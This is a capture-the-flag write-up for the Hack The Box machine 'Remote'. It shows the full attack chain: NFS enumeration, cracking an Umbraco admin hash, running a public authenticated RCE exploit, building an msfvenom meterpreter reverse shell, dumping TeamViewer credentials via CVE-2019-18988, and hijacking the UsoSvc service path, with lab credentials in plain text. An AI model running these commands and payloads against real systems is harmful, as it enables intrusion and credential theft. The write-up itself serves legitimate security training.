Hack The Box - Remote

HackTheBox - Remote

Remote features an instance of Umbraco CMS which is vulnerable to an authenticated remote code execution (RCE). It starts with enumerating public NFS share to finds a set of credentials. These credentials allows me to gain a foothold in the system. Internal enumeration of the system with WinPEAS finds two privilege escalation vectors: TeamViewer7 and service abuse. TeamViewer7 is found to be vulnerable to CVE-2019–18988, and Metasploit has a module for this CVE and it allows me to obtain the TeamViewer credentials. The credentials can be used to login as administrator account. As an alternative, the user has a full access on UsoSvc service, and this can be abused to gain SYSTEM access.

Skills Learned

  • NFS enumeration
  • Umbraco CMS 7.12.4 exploitation
  • Metasploit


  • Kali Linux (Attacking Machine) - https://www.kali.org/
  • Nmap - Preinstalled in Kali Linux
  • metasploit - Preinstalled in Kali Linux
  • nfs-common - apt install nfs-common



→ root@iamf «remote» «»
$ nmap -sC -sV -oA scans/initial-remote ''
  • -sC, to scan with default script
  • -sV, to scan service version
  • -oA, to save the output to all format (xml, nmap, gnmap)
  • -v, verbose mode.
... <snip> ...
Host is up (0.20s latency).
Not shown: 993 closed ports
21/tcp open ftp Microsoft ftpd #1
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) #2
|_http-title: Home — Acme Widgets
111/tcp open rpcbind 2–4 (RPC #100000) 
| rpcinfo: 
| program version port/proto service 
| 100000 2,3,4 111/tcp rpcbind 
| 100000 2,3,4 111/tcp6 rpcbind 
| 100000 2,3,4 111/udp rpcbind 
| 100000 2,3,4 111/udp6 rpcbind 
| 100003 2,3 2049/udp nfs 
| 100003 2,3 2049/udp6 nfs 
| 100003 2,3,4 2049/tcp nfs 
| 100003 2,3,4 2049/tcp6 nfs 
| 100005 1,2,3 2049/tcp mountd 
| 100005 1,2,3 2049/tcp6 mountd 
| 100005 1,2,3 2049/udp mountd 
| 100005 1,2,3 2049/udp6 mountd 
| 100021 1,2,3,4 2049/tcp nlockmgr 
| 100021 1,2,3,4 2049/tcp6 nlockmgr 
| 100021 1,2,3,4 2049/udp nlockmgr 
| 100021 1,2,3,4 2049/udp6 nlockmgr 
| 100024 1 2049/tcp status 
| 100024 1 2049/tcp6 status 
| 100024 1 2049/udp status 
|_ 100024 1 2049/udp6 status 
135/tcp open msrpc Microsoft Windows RPC 
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 
445/tcp open microsoft-ds? 
2049/tcp open mountd 1–3 (RPC #100005) #3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: -25s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2020–03–28T21:04:26
|_ start_date: N/A
... <snip> ...

The result shows a bunch of open ports.


TCP 21 - FTP

Anonymous login is allowed, but nothing here.

TCP 80 - Website


In contact menu, there’s a button that points to


The link brought me into the Umbraco’s login page.

Brute forcing some common credentials with Burp doesn't show any difference.

TCP 2049 - NFS

NFS shares can be enumerated using the showmount command.

If you don’t have it, install with sudo apt install nfs-common

→ root@iamf «remote» «»
$ showmount -e ''
Export list for

I can mount the share to my Kali because it is accessible to everyone.

→ root@iamf «remote» «»
$ mount -t nfs /mnt/iamf

When I ran the find command on the mounted NFS, I discovered two interesting files: embraco.config and umbraco.sdf.

→ root@iamf «iamf» «»
$ find . -type f 2>/dev/null


umbraco.config is a config file formatted in xml and umbraco.sdf is a database file.

image-20210406054737539 img

The config file doesn’t store credentials.

Since the database file is a binary, the strings and grep command can be used to display some readable strings such as “admin”.

→ root@iamf «remote» «»
$ strings App_Data/umbraco.sdf | grep -i admin

User “admin” <admin@htb.local> “admin” <admin@htb.local>umbraco/user/password/changepassword change
User “admin” <admin@htb.local> “admin” <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User “SYSTEM” “admin” <admin@htb.local>umbraco/user/saveupdating LastLoginDate, 

From the output above, I can only guess this is the correct pair of username and password. admin@htb.local:b8be16afba8c314ad33d812f22a04991b90e2aaa

The password that was identified as SHA1 can be cracked online with crackstation. The password is bacondandcheese



Shell as IIS apppool

Access on Umbraco CMS

The credential can be used on Umbraco CMS.


I can see the CMS version by accessing the menu on the left side. A quick search on Google reveals the current version is vulnerable to RCE.

Offensive Security’s Exploit Database ArchiveUmbraco CMS 7.12.4 - (Authenticated) Remote Code Execution.. webapps exploit for ASPX platformwww.exploit-db.com

I copied the exploit and ran it.

→ root@iamf «Umbraco-RCE» «»
$ python exploit.py -u admin@htb.local -p baconandcheese -i -c powershell.exe -a ‘ls c:/’

Persistent Shell - Meterpreter

I can upgrade the RCE to a persistent shell by sending a PowerShell one liner payload or use msfvenom to craft a payload.

I don’t remember correctly, but I think I messed up with the one liner, so I go with msfvenom.

Upload features from Umbraco didn’t restrict .exe file. It is located on /media and the directory of the uploaded file is located on C:/inetpub/wwwroot/media/[itemID]/payload.exe


I’ll create a executable reverse shell and upload it to Umbraco /media page and have listener using Metasploit listening on the specified port.

→ root@iamf «remote» «»
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -a x86 -f exe > fremote.exe

Then I’ll just execute my payload on C:/inetpub/wwwroot/media/1136/fremote.exe

→ root@iamf «remote» «»
$ python exploit.py -u admin@htb.local -p baconandcheese -i -c cmd.exe -a ‘C:/inetpub/wwwroot/media/1136/fremote.exe’

I can spawn PowerShell by typing

meterpreter > execute -f powershell.exe

Privilege Escalation

Shell as Administrator

For the last part, I have two options to gain administrator or system access: TeamViewer7 CVE-2019-18988 and abusing UsoSvc . For UsoSvc, I’m still unsure if it came from the box or was caused by other players, but I’ll show both.

TeamViewer7 CVE-2019-18988

WinPEAS shows there’s TeamViewer7 service currently running. This version is vulnerable to CVE-2019-18988

From https://nvd.nist.gov/vuln/detail/CVE-2019-18988:

It used a shared AES key for all installations since at least as far back as v7.0.43148, and used it for at least OptionsPassword AES in the current version of the product

========================================(Services Information)========================================
... <snip> ... 
    TeamViewer7(TeamViewer GmbH - TeamViewer 7)["C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"] - Auto - Running
    TeamViewer Remote Software
    UsoSvc(Update Orchestrator Service)[cmd \c C:\Users\nc.exe 4444 -e cmd.exe] - Auto - Stopped - No quotes and Space detected
    Manages Windows Updates. If stopped, your devices will not be able download and install latest udpates.
... <snip> ... 

Because metasploit has a post module for that CVE, so I could simply background the current session and run the post module.

meterpreter > run post/windows/gather/credentials/teamviewer_passwords


Remote Access - Evil-WinRM

The password itself is reused by the administrator account.

→ root@iamf «remote» «»
$ evil-winrm -u administrator -p '!R3m0te!' -i htb.remote


(Alternative) Abusing UsoSvc service

If this service was originally from the box, I could just modify the UsoSvc executable path to point to my previous uploaded payload

PS C:\> sc.exe config usosvc binPath="C:/inetpub/wwwroot/media/1136/fremote.exe"

I’ll set netcat listener on port 4444

→ root@iamf «remote» «»
$ nc -nvlp 4444

Now on Remote, I can just start the service.

PS C:\> sc.exe start usosvc

I don’t have any screenshots, but that should work.